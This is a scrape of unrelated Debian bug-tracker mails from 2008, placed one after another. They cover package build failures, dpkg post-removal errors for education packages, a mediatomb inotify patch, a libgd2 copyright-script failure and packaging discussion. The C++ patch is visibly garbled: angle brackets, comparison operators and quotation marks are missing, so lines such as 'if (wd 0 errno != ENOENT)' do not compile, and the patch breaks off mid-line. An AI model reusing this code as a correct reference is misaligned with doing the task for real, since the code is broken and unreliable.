From my pbuilder build log:
...
/usr/bin/make PREFIX=/tmp/buildd/libtest-exception-perl-0.25/debian/`pwd | sed
-e s/.*\/\\(.*\\)-.*/\\1/`/usr OPTIMIZE=-O2 -g -Wall test install
make[1]: Entering directory `/tmp/buildd/libtest-exception-perl-0.25'
cp lib/Test/Exception.pm blib/lib/Test/Exception.pm
PERL_DL_NONLAZY=1 /usr/bin/perl -MExtUtils::Command::MM -e test_harness(0,
'blib/lib', 'blib/arch') t/*.t
t/callerok
t/Exception.ok
t/importok
t/isa...ok
t/lives_and.ok
t/preserve..ok
t/returnok
t/rtok
t/stacktraceNOK 2
# Failed test 'regex in stacktrace ignored'
# in t/stacktrace.t at line 17.
# STDOUT is:
# ok 1 - threw /fribble/
#
# not:
# not ok 1 - threw /fribble/
#
# as expected
# STDERR is:
#
# not:
# (?-xism:#\s+Failed\ test.*?\n?.*?t\/stacktrace\.t at line 13.*\n?)
# # expecting: /fribble/
#
# # found: died at t/stacktrace.t line 13
#
# # Test::Exception::throws_ok('CODE(0x733780)', '/fribble/') called at
t/stacktrace.t line 13
#
# as expected
t/stacktraceFAILED test 2
Failed 1/2 tests, 50.00% okay
t/throws_ok.ok
Failed TestStat Wstat Total Fail Failed List of Failed
---
t/stacktrace.t21 50.00% 2
Failed 1/10 test scripts, 90.00% okay. 1/51 subtests failed, 98.04% okay.
make[1]: *** [test_dynamic] Error 255
make[1]: Leaving directory `/tmp/buildd/libtest-exception-perl-0.25'
make: *** [install] Error 2
dpkg-buildpackage: failure: fakeroot debian/rules binary gave error exit status
2
--
Daniel Schepler
Bug#465608: education has made my debian mentally challenged
No such luck :-( domus:/var/cache/apt/archives# dpkg --force-all -i education-astronomy_0.825_i386.deb (Reading database ... 580683 files and directories currently installed.) Preparing to replace education-astronomy 0.824+svn40294 (using education-astronomy_0.825_i386.deb) ... Unpacking replacement education-astronomy ... err 67: Custom distribution education does not exist dpkg: warning - old post-removal script returned error exit status 67 dpkg - trying script from the new package instead ... err 67: Custom distribution education does not exist dpkg: error processing education-astronomy_0.825_i386.deb (--install): subprocess new post-removal script returned error exit status 67 err 67: Custom distribution education does not exist dpkg: error while cleaning up: subprocess post-removal script returned error exit status 67 Errors were encountered while processing: education-astronomy_0.825_i386.deb Jay Zach [EMAIL PROTECTED] wrote: Tyler MacDonald wrote: Hi, I'm running sid. I've had the education packages installed for awhile... last week, an update came out for them which has completely broken the package manager, making it impossible to upgrade further. I get a message like this for every education-* package: Preparing to replace education-chemistry 0.824+svn40294 (using .../education-chemistry_0.825_i386.deb) ... Unpacking replacement education-chemistry ... err 67: Custom distribution education does not exist dpkg: warning - old post-removal script returned error exit status 67 dpkg - trying script from the new package instead ... err 67: Custom distribution education does not exist dpkg: error processing /var/cache/apt/archives/education-chemistry_0.825_i386.deb (--unpack): subprocess new post-removal script returned error exit status 67 err 67: Custom distribution education does not exist dpkg: error while cleaning up: subprocess post-removal script returned error exit status 67 ... apt-get remove refuses to delete the packages: Reading changelogs... Done dpkg: error processing education-chemistry (--remove): Package is in a very bad inconsistent state - you should reinstall it before attempting a removal. Errors were encountered while processing: education-chemistry E: Sub-process /usr/bin/dpkg returned an error code (1) ... and trying to force dpkg's hand doesnt work either! domus:~# dpkg --force-remove-reinstreq --purge education-chemistry dpkg - warning, overriding problem because --force enabled: Package is in a very bad inconsistent state - you should reinstall it before attempting a removal. (Reading database ... 580601 files and directories currently installed.) Removing education-chemistry ... err 67: Custom distribution education does not exist dpkg: error processing education-chemistry (--purge): subprocess post-removal script returned error exit status 67 Errors were encountered while processing: education-chemistry Is there any safe, sane way I can either remove these 50-some-odd packages or get them to install correctly? Thanks, Tyler I struggled with the same stuff with education-astronomy on my sidux system... There are bug reports for this and the .825 packages are supposed to fix it. I eventually believe that this straightened it out for me (but don't hold me to it as I was trying all kinds of stuff and it was a couple days ago): dpkg --force-all -i /var/cache/apt/archives/education-astronomy_0.825_amd64.deb -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#385115: Chromium BSU sounds/music issue
On Fri, 2008-02-15 at 09:14 -0800, Brian Redfern wrote: I'll have some time this weekend to finish the sounds, I'm getting something that sounds like the original loops using my oasys. I need to spend this weekend finishing everything off so I can pass it over to you. How did you go with it? -- bye, pabs http://wiki.debian.org/PaulWise signature.asc Description: This is a digitally signed message part
Bug#462031: Please build with libwxgtk2.6-dev
On 2008-02-01 06:01 +0200, Guillem Jover wrote: I've done the latter. It builds now with wx2.6, I started the app, seems to work, but don't have data to test. So please review and test. OK. Now tested. It nearly works. The only problem I can see is that the rubber-band distance feedback line reads: H1756? So something is amiss there. I'll take a look at that and see if I can work out what needs doing. I've only tried it in english so far. I suppose I should check something else. Wookey -- Principal hats: Balloonz - Toby Churchill - Aleph One - Debian http://wookware.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#465177: Bug #465177: mediatomb: FTBFS: configure: error: unable to configure inotify support
Hello, I included the changes for the inotify runtime support found in the upstream SVN. The packaging can now be found under: Vcs-git: git://git.debian.org/git/collab-maint/mediatomb.git Vcs-Browser: http://git.debian.org/?p=collab-maint/mediatomb.git Sven, would you mind reveiwing the package direct from the git repository? I could still upload a package to mentors.d.n if you want me to. I switched to git since I thought it would be a good idea to allow a distributed control system for mediatomb. The SVN repository is still up. If nobody has any objections, I'll remove the SVN repository. -- Regards, Andres -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#465177: Bug #465177: mediatomb: FTBFS: configure: error: unable to configure inotify support
Here's the specific patch as well.
--
Regards,
Andres
Patch that allows for inotify support to be checked at runtime.
===
--- mediatomb-0.10.0/src/config_manager.cc.bak 2008-02-19 13:44:03.0 -0500
+++ mediatomb-0.10.0/src/config_manager.cc 2008-02-19 13:53:04.0 -0500
@@ -44,6 +44,10 @@
#include string_converter.h
#include metadata_handler.h
+#ifdef HAVE_INOTIFY
+#include mt_inotify.h
+#endif
+
#if defined(HAVE_LANGINFO_H) defined(HAVE_LOCALE_H)
#include langinfo.h
#include locale.h
@@ -839,19 +843,61 @@
_(from), _(to)));
SET_DICT_OPTION(CFG_IMPORT_MAPPINGS_MIMETYPE_TO_UPNP_CLASS_LIST);
+temp = getOption(_(/import/autoscan/attribute::use-inotify), _(auto));
+if ((temp != auto) !validateYesNo(temp))
+throw _Exception(_(Error in config file: incorrect parameter for
+ \autoscan use-inotify=\ attribute));
+
el = getElement(_(/import/autoscan));
-if (el == nil)
-{
-getOption(_(/import/autoscan), _());
-}
+
NEW_AUTOSCANLIST_OPTION(createAutoscanListFromNodeset(el, TimedScanMode));
SET_AUTOSCANLIST_OPTION(CFG_IMPORT_AUTOSCAN_TIMED_LIST);
+bool inotify_supported = false;
+
#ifdef HAVE_INOTIFY
-NEW_AUTOSCANLIST_OPTION(createAutoscanListFromNodeset(el, InotifyScanMode));
-SET_AUTOSCANLIST_OPTION(CFG_IMPORT_AUTOSCAN_INOTIFY_LIST);
+inotify_supported = Inotify::supported();
#endif
-
+
+if (temp == _(YES))
+{
+#ifdef HAVE_INOTIFY
+if (!inotify_supported)
+throw _Exception(_(You specified
+ \yes\ in \autoscan use-inotify=\
+however your system does not have
+ inotify support));
+#else
+throw _Exception(_(You specified \yes\ in \autoscan use-inotify=\
+however this version of MediaTomb was compiled
+ without inotify support));
+#endif
+}
+
+#ifdef HAVE_INOTIFY
+if (temp == _(auto) || (temp == _(YES)))
+{
+if (inotify_supported)
+{
+NEW_AUTOSCANLIST_OPTION(createAutoscanListFromNodeset(el, InotifyScanMode));
+SET_AUTOSCANLIST_OPTION(CFG_IMPORT_AUTOSCAN_INOTIFY_LIST);
+
+NEW_BOOL_OPTION(true);
+SET_BOOL_OPTION(CFG_IMPORT_AUTOSCAN_USE_INOTIFY);
+}
+else
+{
+NEW_BOOL_OPTION(false);
+SET_BOOL_OPTION(CFG_IMPORT_AUTOSCAN_USE_INOTIFY);
+}
+}
+else
+{
+NEW_BOOL_OPTION(false);
+SET_BOOL_OPTION(CFG_IMPORT_AUTOSCAN_USE_INOTIFY);
+}
+#endif
+
el = getElement(_(/server/custom-http-headers));
NEW_STRARR_OPTION(createArrayFromNodeset(el, _(add), _(header)));
SET_STRARR_OPTION(CFG_SERVER_CUSTOM_HTTP_HEADERS);
--- mediatomb-0.10.0/src/mt_inotify.cc.bak 2008-02-19 13:41:48.0 -0500
+++ mediatomb-0.10.0/src/mt_inotify.cc 2008-02-19 13:54:02.0 -0500
@@ -46,6 +46,7 @@
#include unistd.h
#include errno.h
#include assert.h
+#include tools.h
#include mt_inotify.h
@@ -73,10 +74,29 @@
close(inotify_fd);
}
+bool Inotify::supported()
+{
+int test_fd = inotify_init();
+if (test_fd 0)
+return false;
+else
+{
+close(test_fd);
+return true;
+}
+}
int Inotify::addWatch(String path, int events)
{
-return inotify_add_watch(inotify_fd, path.c_str(), events);
+int wd = inotify_add_watch(inotify_fd, path.c_str(), events);
+if (wd 0 errno != ENOENT)
+{
+if (errno == ENOSPC)
+throw _Exception(_(The user limit on the total number of inotify watches was reached or the kernel failed to allocate a needed resource.));
+else
+throw _Exception(mt_strerror(errno));
+}
+return wd;
}
void Inotify::removeWatch(int wd)
--- mediatomb-0.10.0/src/content_manager.cc.bak 2008-02-19 13:56:13.0 -0500
+++ mediatomb-0.10.0/src/content_manager.cc 2008-02-19 14:15:55.0 -0500
@@ -87,6 +87,7 @@
ContentManager::ContentManager() : TimerSubscriberSingletonContentManager()
{
+int i;
cond = RefCond(new Cond(mutex));
ignore_unknown_extensions = 0;
@@ -143,24 +144,31 @@
autoscan_timed = storage-getAutoscanList(TimedScanMode);
#ifdef HAVE_INOTIFY
-RefAutoscanList config_inotify_list =
-cm-getAutoscanListOption(CFG_IMPORT_AUTOSCAN_INOTIFY_LIST);
-
-for (int i = 0; i config_inotify_list-size(); i++)
+if (cm-getBoolOption(CFG_IMPORT_AUTOSCAN_USE_INOTIFY))
{
-RefAutoscanDirectory dir = config_inotify_list-get(i);
-if (dir != nil)
+RefAutoscanList config_inotify_list =
+cm-getAutoscanListOption(CFG_IMPORT_AUTOSCAN_INOTIFY_LIST);
+
+for (i = 0; i config_inotify_list-size(); i++)
{
-String
Processed: your mail
Processing commands for [EMAIL PROTECTED]: tags 465177 patch Bug#465177: FTBFS: configure: error: unable to configure inotify support Tags were: help Tags added: patch tags 465177 - help Bug#465177: FTBFS: configure: error: unable to configure inotify support Tags were: patch help Tags removed: help thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466642: libgd2: FTBFS: Broken pipes generating debian/copyright
Package: libgd2
Version: 2.0.36~rc1~dfsg-1
Severity: serious
From my pbuilder build log:
...
find * -type f -not -regex 'debian/.*' -not -regex
'\(.*/\)?config\.\(guess\|sub\|rpath\)\(\..*\)?' -exec cat '{}' ';' \
| tr '\r' '\n' \
| LC_ALL=C sed -e 's/[^[:print:]]//g' \
| egrep --text -rih '(copyright|\(c\) ).*[0-9]{4}' \
| sed -e 's/^[[:space:]*#]*//' -e 's/[[:space:]]*$//' \
| LC_ALL=C sort -u \
debian/copyright_newhints
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
find: cat terminated by signal 13
Error: The following new or changed copyright notices discovered:
COPYR = Copyright (C) 1996-2007 Boutell.Com, Inc.
Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999,
Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002,
2003, 2004, 2005
Copyright 1996-2002 Free Software Foundation, Inc.
Copyright \(co 1998 Owen Taylor
Copyright © 2002-2007 Jonas Smedegaard [EMAIL PROTECTED]
Copyright © 2004-2006 Jonas Smedegaard [EMAIL PROTECTED]
Copyright © 2005-2007 Jonas Smedegaard [EMAIL PROTECTED]
Copyright © 2007 Jonas Smedegaard [EMAIL PROTECTED]
Updating copyright file (Closes: #119288).
VALUE LegalCopyright, Copyright �
Bug#385115: Chromium BSU sounds/music issue
On Tue, 2008-02-19 at 20:35 -0800, Brian Redfern wrote: Its almost there, I'm just tweaking it to sound as much as the original as possible without causing copyright issues (ie being an exact copy). I'm also working on sound effects, so I'm hopinh to finish this weekend, even though I said last weekend, I still have a couple of more things to do to get it sound exactly right. Excellent, thanks for the update. -- bye, pabs http://wiki.debian.org/PaulWise signature.asc Description: This is a digitally signed message part
Processed: setting package to cacao, tagging 458631
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.16 package cacao Ignoring bugs not assigned to: cacao tags 458631 + pending Bug#458631: cacao: FTBFS: error: variable '_Jv_JNIInvokeInterface' has initializer but incomplete type There were no tags set. Tags added: pending End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#446665: mercury: should this package be removed?
Hi... On Feb 20, 2008 9:50 AM, Paul Bone [EMAIL PROTECTED] wrote: Mercury also supports 'grades', this makes it different to other compliers and more interesting to package. Each grade represents a complier backend and some options. There are two C backends, a Java backend, and Erlang backend and a MSIL backend. Options can include optional garbage collection (as apposed to never reclaiming memory), profiling support, debugging support and more. I'd like to package the library and runtime for each grade. These can all be installed concurrently and won't conflict. There are at least two issues you may have to deal with here: * Mercury does not provide any guarantees about a stable library ABI, so you'll have difficulty packaging grades using shared libraries and not breaking applications when you update the libraries. * Mercury standard libraries can be very large (tens of megabytes in some of the debug grades), so packaging every possible grade seems rather wasteful of archive space. If you ask me, you need to pick a small set of useful grades which cover most use cases. I'm not sure how many architectures Debain supports at the moment, but if you aren't careful you could easily consume hundreds of megabytes of fileserver space just on Mercury library grades (10+ architectures * 10s of Mb/grade * many grades). Peter -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: setting package to cacao, tagging 441122, tagging 449185
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.16 package cacao Ignoring bugs not assigned to: cacao tags 441122 + pending Bug#441122: cacao - FTBFS: undefined reference to `__data_start' Tags were: patch Tags added: pending tags 449185 + pending Bug#449185: FTBFS on mips/mipsel Tags were: patch Tags added: pending End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
